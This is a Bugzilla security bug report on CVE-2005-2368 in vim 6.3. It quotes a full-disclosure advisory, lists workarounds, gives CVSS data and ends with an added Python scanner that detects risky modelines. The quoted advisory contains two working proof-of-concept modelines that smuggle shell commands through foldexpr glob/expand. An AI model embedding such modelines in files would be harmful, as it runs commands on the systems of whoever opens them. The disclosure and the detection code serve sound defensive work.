Bugzilla – Bug 98300
VUL-0: CVE-2005-2368: vim modeline vuln again
Last modified: 2021-10-19 13:46:19 UTC
We received the following report via full-disclosure. The issue is public. We didn't fix modeline stuff in released distros in the past but it's increasingly making me nervous. Couldn't vim just ask whether it should execute modelines?

Date: Mon, 25 Jul 2005 18:33:00 +0300
From: Georgi Guninski <guninski@guninski.com>
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Help poor children in Uganda

Georgi Guninski security advisory #75, 2005

Help poor children in Uganda

Systems affected:
vim 6.3

Date: 25 July 2005

Legal Notice:
This Advisory is Copyright (c) 2005 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.

Description:
open file in vim 6.3 < 6.3.082 with modelines on, got owned.

Details:
--1--
vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"): cannot be used in vulnerability databases.
-----

--2--
vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"): cannot be used in vulnerability databases.
-----

Workaround:
1. (preferred) Disable modelines via set modelines=0 and/or set nomodeline in .vimrc
or
2. upgrade to 6.3.082 - patch available at: ftp://ftp.vim.org/pub/vim/patches/6.3/

--
where do you want bill gates to go today?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Candidate: CAN-2005-2368
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2368
Reference: FULLDISC:20050725 Help poor children in Uganda
Reference: URL:http://lists.grok.org.uk/pipermail/full-disclosure/2005-July/035402.html
Reference: MISC:http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

vim 6.3 before 6.3.082, with modelines enabled, allows attackers to execute arbitrary commands via shell metacharacters in the (1) glob or (2) expand commands of a foldexpr expression for calculating fold levels.
But we haven't had modelines enabled in ages?
That's just to prevent everyone from being vulnerable by default. Yet they are useful so people who know that turn them on.
Well, sure, but that's not our problem is it? Anyway--is it possible to turn on so vim asks to execute modelines?
I don't know, that's what I was asking you.
BTW, this bug is fixed in STABLE since July 21st.
CVE-2005-2368: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
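
For triaging files on hosts where modelines are switched on, the check below flags modelines that set an expression-evaluated option such as the foldexpr named in the CVE description. It is an added example, not code from this bug report or from Vim. The function names, the simplified modeline grammar, the inclusion of indentexpr and includeexpr, and the sample file are this example's own assumptions.

```python
import re

# Simplified modeline grammar (assumption): "vi:", "vim:" or "ex:" at line
# start or after whitespace, then the option text to end of line.
MODELINE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$")
# Options whose value Vim evaluates as an expression. foldexpr (fde) is the
# one in the advisory; indentexpr and includeexpr are added by this example.
EXPR_OPTS = {"foldexpr", "fde", "indentexpr", "inde", "includeexpr", "inex"}
# The two functions named in the CVE description.
RISKY_CALL = re.compile(r"\b(?:glob|expand)\s*\(")


def modeline_options(line):
    """Return [(name, value)] for options a modeline on this line would set."""
    m = MODELINE.search(line)
    if not m:
        return []
    body = m.group(1)
    set_form = re.match(r"set?\s+(.*)", body)
    if set_form:  # "vim: set opt=val ... :" ends at the first unescaped colon
        body = re.split(r"(?<!\\):", set_form.group(1))[0]
    # Split on unescaped colons or whitespace; "\ " stays inside a value.
    parts = [p for p in re.split(r"(?<!\\)[:\s]+", body) if p]
    return [(name, value) for name, _, value in (p.partition("=") for p in parts)]


def scan(text, modelines=5):
    """Flag expression options in the first/last `modelines` lines of text."""
    lines = text.splitlines()
    n = len(lines)
    checked = sorted(set(range(min(modelines, n))) |
                     set(range(max(0, n - modelines), n)))
    findings = []
    for i in checked:
        for name, value in modeline_options(lines[i]):
            if name in EXPR_OPTS:
                kind = "glob/expand call" if RISKY_CALL.search(value) else "expression"
                findings.append((i + 1, name, kind))
    return findings


# Constructed sample file: placeholders only, no shell metacharacters.
SAMPLE = "\n".join(
    ['# vim: foldmethod=expr:foldexpr=glob("PLACEHOLDER"): trailing text']
    + ["data"] * 20
    + ['# vim: foldexpr=expand("MID-FILE"):']  # line 22: outside the window
    + ["data"] * 20
    + ["/* vim: set ts=4 sw=4 fde=MyFold() : */"]
)
```

The `modelines` parameter mirrors Vim's option of the same name (default 5), so `scan(text, modelines=0)` reports nothing, matching the advisory's preferred workaround.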